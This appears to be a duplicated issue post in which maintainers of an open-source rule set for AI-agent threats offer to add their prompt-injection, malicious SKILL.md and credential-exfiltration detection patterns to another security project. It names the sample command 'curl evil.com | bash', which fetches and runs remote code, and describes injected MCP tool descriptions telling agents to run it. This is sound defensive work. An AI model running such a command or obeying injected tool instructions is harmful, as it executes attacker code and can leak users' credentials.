Hi Sage team,
ATR (Agent Threat Rules) maintains 108 open-source detection rules focused on AI agent-layer threats — prompt injection via tool descriptions, malicious SKILL.md files, credential exfiltration through MCP responses, and supply chain attacks on skill registries. Same rules that Cisco AI Defense ships in production (cisco-ai-defense/skill-scanner#79).
Sage's existing 313 rules cover OS/command-layer threats excellently. ATR rules cover the agent protocol layer that sits above — threats that arrive through MCP tool descriptions and SKILL.md files before they become OS commands.
Example gap ATR fills: Sage catches curl evil.com | bash (command layer). ATR catches the MCP tool description that instructs the agent to run curl evil.com | bash — before the command is ever generated.
What ATR covers (not in Sage today):
- Prompt injection in tool descriptions (10 patterns)
- Malicious SKILL.md content (10 patterns)
- Hidden LLM instructions in MCP responses (10 patterns)
- Credential exfiltration via agent context (10 patterns)
- Fork impersonation / typosquatting skills (10 patterns)
- Agent manipulation / social engineering (10 patterns)
- 7 more categories (87 total high-confidence patterns)
Tested on: 53,577 real-world MCP skills, 0% FP on clean content.
Questions before we submit a PR:
- Would ATR patterns fit in existing
threats/ files (e.g. a new agent-threats.yaml) or a separate directory?
- ATR rules use
match_on: content — does that align with Sage's content matching?
- Our rules are MIT licensed. Your
threats/ dir uses DRL-1.1. Should we relicense contributed patterns to DRL-1.1?
Happy to convert ATR patterns to your exact YAML schema. We use a very similar format already.
Hi Sage team,
ATR (Agent Threat Rules) maintains 108 open-source detection rules focused on AI agent-layer threats — prompt injection via tool descriptions, malicious SKILL.md files, credential exfiltration through MCP responses, and supply chain attacks on skill registries. Same rules that Cisco AI Defense ships in production (cisco-ai-defense/skill-scanner#79).
Sage's existing 313 rules cover OS/command-layer threats excellently. ATR rules cover the agent protocol layer that sits above — threats that arrive through MCP tool descriptions and SKILL.md files before they become OS commands.
Example gap ATR fills: Sage catches
curl evil.com | bash(command layer). ATR catches the MCP tool description that instructs the agent to runcurl evil.com | bash— before the command is ever generated.What ATR covers (not in Sage today):
Tested on: 53,577 real-world MCP skills, 0% FP on clean content.
Questions before we submit a PR:
threats/files (e.g. a newagent-threats.yaml) or a separate directory?match_on: content— does that align with Sage's content matching?threats/dir uses DRL-1.1. Should we relicense contributed patterns to DRL-1.1?Happy to convert ATR patterns to your exact YAML schema. We use a very similar format already.